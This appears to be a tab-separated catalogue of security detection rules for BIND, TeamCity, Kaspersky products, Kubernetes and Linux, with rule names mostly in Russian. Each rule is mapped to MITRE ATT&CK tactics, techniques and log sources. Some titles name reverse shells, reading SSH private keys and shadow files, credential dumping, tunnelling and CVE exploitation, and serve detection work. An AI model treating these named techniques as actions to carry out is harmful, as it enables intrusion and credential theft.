Internet Systems Consortium	BIND	RV-D-647	Использование DNS-туннеля	TA0010 (Exfiltration), TA0011 (Command and Control)	T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1132 (Data Encoding), T1132.001 (Data Encoding: Standard Encoding)	queries.log
Internet Systems Consortium	BIND	RV-D-730	Обнаружен DNS-запрос к домену localtonet	TA0011 (Command and Control)	T1572 (Protocol Tunneling)	queries.log
JetBrains	TeamCity	RV-D-69	Эксплуатация уязвимости в JetBrains TeamCity - CVE-2024-27198	TA0004 (Privilege Escalation), TA0005 (Defense Evasion), TA0003 (Persistence), TA0001 (Initial Access)	T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution), T1212 (Exploitation for Credential Access)	access.log
JetBrains	TeamCity	RV-D-551	Вход привилегированного пользователя в TeamCity с неизвестного хоста	TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	teamcity-auth.log
JetBrains	TeamCity	RV-D-552	Успешный подбор пароля к JetBrains TeamCity	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	teamcity-server.log, teamcity-auth.log
JetBrains	TeamCity	RV-D-553	Подбор пароля к JetBrains TeamCity	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	teamcity-server.log
JetBrains	TeamCity	RV-D-554	Получение авторизационного токена TeamCity	TA0003 (Persistence), TA0006 (Credential Access)	T1528 (Steal Application Access Token)	teamcity-activities.log
JetBrains	TeamCity	RV-D-555	Загрузка плагина TeamCity	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1505 (Server Software Component: Web Shell)	teamcity-server.log
JetBrains	TeamCity	RV-D-556	Создание учетной записи TeamCity	TA0003 (Persistence)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	teamcity-server.log
JetBrains	TeamCity	RV-D-557	Изменение состава или роли группы	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)	teamcity-activities.log
JetBrains	TeamCity	RV-D-558	Включена возможность удаленного выполнения команд	TA0002 (Execution), TA0004 (Privilege Escalation), TA0011 (Command and Control)	T1059 (Command and Scripting Interpreter), T1068 (Exploitation for Privilege Escalation), T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1190 (Exploit Public-Facing Application)	access.log
JetBrains	TeamCity	RV-D-559	Изменение конфигурации сборки под подозрительной УЗ	TA0008 (Lateral Movement)	T1021 (Remote Services)	teamcity-activities.log
JetBrains	TeamCity	RV-D-658	Эксплуатация CVE-2023-42793 в JetBrains TeamCity	TA0002 (Execution), TA0004 (Privilege Escalation)	T1068 (Exploitation for Privilege Escalation), T1134 (Access Token Manipulation), T1134.003 (Access Token Manipulation: Make and Impersonate Token), T1190 (Exploit Public-Facing Application), T1195 (Supply Chain Compromise), T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools), T1210 (Exploitation of Remote Services), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)	access.log
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-664	Вредоносное вложение в письме	TA0001 (Initial Access), TA0043 (Reconnaissance)	T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-665	Вредоносная ссылка в письме	TA0001 (Initial Access)	T1189 (Drive-by Compromise), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_URL)
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-666	Проверка подлинности отправителя сообщений	TA0001 (Initial Access)	T1534 (Internal Spearphishing), T1566 (Phishing), T1598 (Phishing for Information)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT)
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-667	Получение массовой рассылки писем	TA0001 (Initial Access)	T1566 (Phishing), T1598 (Phishing for Information), T1667 (Email Bombing)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-668	Получение спам-письма	TA0001 (Initial Access)	T1566 (Phishing), T1598 (Phishing for Information)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_AS_STATUS)
Kaspersky	Kaspersky Secure Mail Gateway	RV-D-669	Шифрованное вложение в письме	TA0001 (Initial Access)	T1027 (Obfuscated Files or Information), T1534 (Internal Spearphishing), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1598 (Phishing for Information), T1598.002 (Phishing for Information: Spearphishing Attachment)	Kaspersky Secure Mail Gateway (LMS_EV_SCAN_LOGIC_PART_RESULT, LMS_EV_SCAN_LOGIC_AV_STATUS)
Kaspersky	Kaspersky Security Center	RV-DD-1	Успешное исполнение задачи на удаленную установку программы средствами KSC через установочные пакеты	TA0002 (Execution), TA0008 (Lateral Movement)	T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED, KLAUD_EV_OBJECTMODIFY)
Kaspersky	Kaspersky Security Center	RV-D-83	Критичная политика была изменена Kaspersky	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)
Kaspersky	Kaspersky Security Center	RV-D-84	Повторное заражение хоста одним вирусом	TA0008 (Lateral Movement), TA0002 (Execution)	T1080 (Taint Shared Content), T1204 (User Execution), T1204.002 (User Execution: Malicious File), T1204.003 (User Execution: Malicious Image), T1210 (Exploitation of Remote Services)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND)
Kaspersky	Kaspersky Security Center	RV-D-85	Устройство перемещено в группу администрирования на сервере KSC	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLAUD_EV_ADMGROUP_CHANGED)
Kaspersky	Kaspersky Security Center	RV-D-86	Зафиксировано отключение задачи средств AV-защиты Kaspersky	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (EventID_000000de)
Kaspersky	Kaspersky Security Center	RV-D-87	На сервере KSC созданы пакет установки и удаленная задача на установку пакета	TA0002 (Execution), TA0008 (Lateral Movement)	T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)
Kaspersky	Kaspersky Security Center	RV-D-89	Изменение политик администрирования на сервере KSC	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY)
Kaspersky	Kaspersky Security Center	RV-D-90	Отключение продукта Kaspersky в результате выполнения задачи	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLPRCI_TaskState)
Kaspersky	Kaspersky Security Center	RV-D-91	Отключение компонентов защиты продуктов Kaspersky	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (EventID_000000d6)
Kaspersky	Kaspersky Security Center	RV-D-92	Создание и исполнение задачи на удаленную деинсталляцию программы средствами KSC	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLAUD_EV_OBJECTMODIFY, KLAUD_EV_TASK_STATE_CHANGED)
Kaspersky	Kaspersky Security Center	RV-D-93	Успешное исполнение задачи на удаленную установку программы средствами KSC	TA0005 (Defense Evasion), TA0002 (Execution), TA0008 (Lateral Movement)	T1072 (Software Deployment Tools), T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLPRCI_TaskState, KLNAG_EV_INV_APP_INSTALLED)
Kaspersky	Kaspersky Security Center	RV-D-94	Зафиксирован переход по опасной ссылке	TA0002 (Execution), TA0043 (Reconnaissance)	T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link), T1608 (Stage Capabilities), T1608.005 (Stage Capabilities: Link Target)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_AND_REPORTED, GNRL_EV_VIRUS_FOUND_AND_BLOCKED)
Kaspersky	Kaspersky Security Center	RV-D-95	Множество хостов заражены одним типом ВПО	TA0042 (Resource Development)	T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)
Kaspersky	Kaspersky Security Center	RV-D-96	Множественное срабатывание вердиктов средств AV-защиты на одном хосте	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN)
Kaspersky	Kaspersky Security Center	RV-D-97	Зафиксирована сетевая атака	TA0043 (Reconnaissance)	T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)	Kaspersky Security Center (GNRL_EV_ATTACK_DETECTED)
Kaspersky	Kaspersky Security Center	RV-D-98	Зафиксированы устаревшие базы антивирусного ПО Kaspersky	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (EventID_000000cf, EventID_000000d0)
Kaspersky	Kaspersky Security Center	RV-D-99	Включение учетной записи пользователя на сервере KSC	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation)	Kaspersky Security Center (KLAUD_EV_OBJECTPROPMODIFIED)
Kaspersky	Kaspersky Security Center	RV-D-100	Было удалено обнаруженное средствами AV-защиты ВПО	TA0042 (Resource Development)	T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND, GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_OBJECT_DELETED, GNRL_EV_OBJECT_CURED, GNRL_EV_OBJECT_BLOCKED)
Kaspersky	Kaspersky Security Center	RV-D-101	Не было удалено обнаруженное средствами AV-защиты ВПО	TA0042 (Resource Development)	T1608 (Stage Capabilities), T1608.001 (Stage Capabilities: Upload Malware)	Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_VIRUS_FOUND, GNRL_EV_OBJECT_NOTCURED, GNRL_EV_OBJECT_REPORTED, EventID_00000139, EventID_000009fc)
Kaspersky	Kaspersky Security Center	RV-D-688	Подключение недоверенного устройства	TA0001 (Initial Access), TA0008 (Lateral Movement), TA0011 (Command and Control)	T1091 (Replication Through Removable Media), T1219 (Remote Access Tools), T1219.003 (Remote Access Tools: Remote Access Hardware)	Kaspersky Endpoint Security (GNRL_EV_DEVCTRL_DEV_PLUG_DENIED)
Kaspersky	Kaspersky Security Center	RV-D-766	Устройство давно не подключалось к серверу KSC	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)	Kaspersky Security Center (KLSRV_HOST_STATUS_CRITICAL)
Kubernetes	Kubernetes	RV-D-102	Изменение файлов helm	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)	Auditd
Kubernetes	Kubernetes	RV-D-103	Привязка стандартных административных ролей k8s	TA0003 (Persistence)	T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)	audit.log
Kubernetes	Kubernetes	RV-D-104	Добавление кластерных ролей k8s	TA0003 (Persistence)	T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)	audit.log
Kubernetes	Kubernetes	RV-D-105	Удаление роли k8s	TA0003 (Persistence)	T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)	audit.log
Kubernetes	Kubernetes	RV-D-106	Добавление ролей k8s	TA0003 (Persistence)	T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)	audit.log
Kubernetes	Kubernetes	RV-D-510	Анонимный доступ к секретам k8s	TA0006 (Credential Access)	T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API)	audit.log
Kubernetes	Kubernetes	RV-D-576	Изменение стандартов безопасности pod	TA0005 (Defense Evasion)	T1562 (Impair Defenses)	audit.log
Kubernetes	Kubernetes	RV-D-577	Создание static pods	TA0003 (Persistence)	T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)	audit.log
Kubernetes	Kubernetes	RV-D-637	Создание сервисного аккаунта k8s	TA0003 (Persistence)	T1136 (Create Account), T1136.001 (Create Account: Local Account)	audit.log
Kubernetes	Kubernetes	RV-D-641	Неуспешный запрос от сервисного аккаунта k8s	TA0007 (Discovery)	T1613 (Container and Resource Discovery)	audit.log
Kubernetes	Kubernetes	RV-D-642	Создание или изменение службы NodePort	TA0003 (Persistence)	T1133 (External Remote Services)	audit.log
Kubernetes	Kubernetes	RV-D-645	Поиск разрешений сервисным аккаунтом k8s	TA0007 (Discovery)	T1069 (Permission Groups Discovery)	audit.log
Kubernetes	Kubernetes	RV-D-646	Поиск секретов k8s	TA0007 (Discovery)	T1613 (Container and Resource Discovery)	audit.log
Kubernetes	Kubernetes	RV-D-649	Запуск интерактивной оболочки в контейнере	TA0002 (Execution)	T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API), T1609 (Container Administration Command)	audit.log
Kubernetes	Kubernetes	RV-D-751	Создание привилегированного пода k8s	TA0004 (Privilege Escalation)	T1610 (Deploy Container), T1611 (Escape to Host)	audit.log
Kubernetes	Kubernetes	RV-D-752	Создание контейнера с Linux Capabilities	TA0004 (Privilege Escalation)	T1610 (Deploy Container), T1611 (Escape to Host)	audit.log
Kubernetes	Kubernetes	RV-D-757	Назначение сервисного аккаунта контейнеру в kube-system	TA0004 (Privilege Escalation)	T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1098 (Account Manipulation)	audit.log
Linux		RV-D-107	Использование утилит для создания снимков экрана Linux	TA0009 (Collection)	T1113 (Screen Capture)	Auditd
Linux		RV-D-108	Загрузка файлов с удаленных ресурсов при помощи стандартных утилит	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Auditd
Linux		RV-D-109	Туннелирование с использованием ngrok в Linux	TA0011 (Command and Control)	T1090 (Proxy), T1090.002 (Proxy: External Proxy)	Auditd
Linux		RV-D-110	Загрузка файлов утилитой wget в директорию tmp	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	R-Point
Linux		RV-D-111	Чтение файлов с историей команд	TA0006 (Credential Access)	T1552 (Unsecured Credentials), T1552.003 (Unsecured Credentials: Bash History)	Auditd
Linux		RV-D-112	Чтение файлов с пользовательскими учетными данными	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)	Auditd
Linux		RV-D-114	Подбор пароля на хосте Linux	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Auditd, auth.log, secure
Linux		RV-D-115	Успешный подбор пароля на хосте Linux	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)	Auditd, auth.log, secure
Linux		RV-D-116	Дамп памяти утилитой MimiPenguin на Linux	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow)	Auditd
Linux		RV-D-117	Вызов команды из модуля PAM	TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)	T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules)	R-Point
Linux		RV-D-118	Чтение файлов с закрытыми ключами SSH	TA0006 (Credential Access)	T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys)	Auditd
Linux		RV-D-119	Чтение памяти процессов на Linux	TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1055 (Process Injection), T1055.009 (Process Injection: Proc Memory)	Auditd
Linux		RV-D-120	Доступ к критичным файлам SSSD	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.005 (OS Credential Dumping: Cached Domain Credentials), T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1558 (Steal or Forge Kerberos Tickets)	Auditd
Linux		RV-D-121	Подбор пароля пользователя Linux	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Auditd, auth.log, secure
Linux		RV-D-122	Успешный подбор пароля пользователя Linux	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Auditd, auth.log, secure
Linux		RV-D-123	Удаление файлов логирования в Linux	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.003 (Indicator Removal: Clear Command History)	Auditd
Linux		RV-D-124	Загрузка подозрительного ebpf модуля	TA0005 (Defense Evasion)	T1014 (Rootkit)	Auditd
Linux		RV-D-125	Изменение конфигурационных файлов службы firewalld	TA0005 (Defense Evasion)	T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall)	Auditd
Linux		RV-D-126	Изменение критичных файлов конфигурации интерактивной оболочки	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1562.003 (Impair Defenses: Impair Command History Logging)	Auditd
Linux		RV-D-127	Изменение конфигурационных файлов служб журналирования	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations), T1562 (Impair Defenses), T1562.006 (Impair Defenses: Indicator Blocking), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System)	Auditd
Linux		RV-D-128	Копирование стандартных исполняемых файлов (маскарадинг утилит)	TA0005 (Defense Evasion)	T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities)	Auditd
Linux		RV-D-129	Отключение или модификация Syslog Linux	TA0005 (Defense Evasion)	T1562.006 (Impair Defenses: Indicator Blocking)	Auditd
Linux		RV-D-130	Отключение службы firewalld	TA0005 (Defense Evasion)	T1562.004 (Impair Defenses: Disable or Modify System Firewall)	Auditd
Linux		RV-D-131	Отключение или изменение службы SELinux	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Auditd
Linux		RV-D-132	Изменение привилегий файлов Linux	TA0005 (Defense Evasion)	T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification)	Auditd
Linux		RV-D-133	Создание/изменение скрытых файлов Linux	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)	Auditd
Linux		RV-D-134	Создание/изменение скрытых shared object файлов	TA0005 (Defense Evasion)	T1129 (Shared Modules), T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)	Auditd
Linux		RV-D-135	Загрузка кода в процесс Linux	TA0005 (Defense Evasion)	T1620 (Reflective Code Loading)	Auditd
Linux		RV-D-136	Изменение корневых сертификатов Linux	TA0005 (Defense Evasion)	T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)	Auditd
Linux		RV-D-137	Изменение tmp файлов логирования Linux	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs)	Auditd
Linux		RV-D-138	Большое количество подозрительных команд	TA0007 (Discovery)	T1016 (System Network Configuration Discovery), T1057 (Process Discovery), T1082 (System Information Discovery), T1518 (Software Discovery)	Auditd
Linux		RV-D-139	Получение информации о текущем пользователе	TA0007 (Discovery)	T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)	Auditd
Linux		RV-D-140	Разведка доменных УЗ в Linux	TA0007 (Discovery)	T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)	Auditd
Linux		RV-D-141	Разведка локальных УЗ в Linux	TA0007 (Discovery)	T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)	Auditd
Linux		RV-D-142	Разведка установленного ПО в Linux	TA0007 (Discovery)	T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)	Auditd
Linux		RV-D-143	Поиск локализации системы Linux	TA0007 (Discovery)	T1614 (System Location Discovery), T1614.001 (System Location Discovery: System Language Discovery)	Auditd
Linux		RV-D-144	Поиск сетевых конфигураций	TA0007 (Discovery)	T1016 (System Network Configuration Discovery), T1016.001 (System Network Configuration Discovery: Internet Connection Discovery), T1590 (Gather Victim Network Information)	Auditd
Linux		RV-D-145	Разведка парольной политики в Linux	TA0007 (Discovery)	T1201 (Password Policy Discovery)	Auditd
Linux		RV-D-146	Разведка запущенных процессов в Linux	TA0007 (Discovery)	T1057 (Process Discovery)	Auditd
Linux		RV-D-147	Поиск окружения контейнера через proc VFS	TA0007 (Discovery)	T1082 (System Information Discovery)	R-Point
Linux		RV-D-148	Попытка обнаружения контейнеров через Inodes Listing	TA0007 (Discovery)	T1082 (System Information Discovery)	R-Point
Linux		RV-D-149	Использование сетевых утилит Linux для сканирования сети	TA0007 (Discovery), TA0043 (Reconnaissance)	T1046 (Network Service Discovery), T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)	Auditd
Linux		RV-D-150	Разведка Docker контейнеров через Dockerenv	TA0007 (Discovery)	T1082 (System Information Discovery)	R-Point
Linux		RV-D-151	Поиск файлов с suid/sgid битом	TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)	Auditd
Linux		RV-D-152	Подозрительное чтение домашней директории пользователя	TA0007 (Discovery)	T1083 (File and Directory Discovery)	Auditd
Linux		RV-D-153	Разведка системной информации Linux	TA0043 (Reconnaissance)	T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)	Auditd
Linux		RV-D-154	Получена информация о системных службах на узле	TA0007 (Discovery)	T1007 (System Service Discovery)	Auditd
Linux		RV-D-155	Эксплуатация уязвимости CVE-2023-46944 в расширении GitLens для VSCode на Linux	TA0002 (Execution)	T1203 (Exploitation for Client Execution)	Auditd
Linux		RV-D-156	Создание интерактивной оболочки через GTFOBins	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1218 (System Binary Proxy Execution)	Auditd
Linux		RV-D-157	Сетевое обращение от подозрительного скрипта в Linux	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1204 (User Execution), T1204.002 (User Execution: Malicious File)	Auditd
Linux		RV-D-158	Создание подозрительного Named Pipe с помощью Mkfifo	TA0002 (Execution)	T1559 (Inter-Process Communication)	R-Point
Linux		RV-D-159	Reverse-shell через Bash-сценарий	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)	Auditd
Linux		RV-D-160	Создан Reverse-shell сторонней утилитой в Linux	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)	Auditd
Linux		RV-D-161	Использование хакерской утилиты в Linux	TA0042 (Resource Development)	T1587 (Develop Capabilities)	Auditd
Linux		RV-D-162	Остановка критичных сервисов в Linux	TA0040 (Impact)	T1489 (Service Stop)	Auditd
Linux		RV-D-163	Загрузка файла с помощью утилит GTFOBins	TA0008 (Lateral Movement)	T1570 (Lateral Tool Transfer)	Auditd
Linux		RV-D-164	Создание туннелей и перенаправление трафика	TA0008 (Lateral Movement), TA0011 (Command and Control)	T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1572 (Protocol Tunneling)	Auditd
Linux		RV-D-165	Загрузка файла сервисной учетной записью	TA0008 (Lateral Movement)	T1570 (Lateral Tool Transfer)	Auditd
Linux		RV-D-166	Разведка под сервисным пользователем	TA0007 (Discovery)	T1016 (System Network Configuration Discovery), T1046 (Network Service Discovery), T1082 (System Information Discovery), T1087 (Account Discovery), T1570 (Lateral Tool Transfer)	Auditd
Linux		RV-D-167	Изменение настроек пользователя	TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching), T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)	R-Point
Linux		RV-D-168	Создание и удаление уз в короткий период времени	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	Auditd, auth.log, secure
Linux		RV-D-169	Изменение критичных файлов Linux	TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)	T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1098 (Account Manipulation), T1098.004 (Account Manipulation: SSH Authorized Keys), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System), T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)	Auditd
Linux		RV-D-170	Изменение задач cron	TA0003 (Persistence)	T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron)	Auditd
Linux		RV-D-171	Закрепление при помощи утилиты Trap	TA0004 (Privilege Escalation), TA0003 (Persistence)	T1546 (Event Triggered Execution), T1546.005 (Event Triggered Execution: Trap)	Auditd
Linux		RV-D-172	Добавление/удаление модулей ядра Linux	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1014 (Rootkit), T1547 (Boot or Logon Autostart Execution), T1547.006 (Boot or Logon Autostart Execution: Kernel Modules and Extensions)	Auditd
Linux		RV-D-173	Изменение библиотеки liblzma	TA0003 (Persistence)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1554 (Compromise Host Software Binary), T1556 (Modify Authentication Process)	Auditd
Linux		RV-D-175	Модификация правил udev	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1546 (Event Triggered Execution), T1546.017 (Event Triggered Execution: Udev Rules)	Auditd
Linux		RV-D-176	Создание пользователя или группы	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)	auth.log, Auditd, secure
Linux		RV-D-177	Закрепление в системе с использованием записей автозагрузки XDG	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1547 (Boot or Logon Autostart Execution), T1547.013 (Boot or Logon Autostart Execution: XDG Autostart Entries)	Auditd
Linux		RV-D-178	Создание/изменение правила nf_tables	TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1068 (Exploitation for Privilege Escalation), T1562.004 (Impair Defenses: Disable or Modify System Firewall)	Auditd
Linux		RV-D-179	Повышение привилегий при помощи pkexec	TA0004 (Privilege Escalation)	T1068 (Exploitation for Privilege Escalation)	Auditd
Linux		RV-D-180	Внедрение процесса в другой через ptrace	TA0005 (Defense Evasion), TA0004 (Privilege Escalation)	T1055 (Process Injection), T1055.008 (Process Injection: Ptrace System Calls)	Auditd
Linux		RV-D-181	Повышение привилегий до root	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1068 (Exploitation for Privilege Escalation), T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation)	R-Point
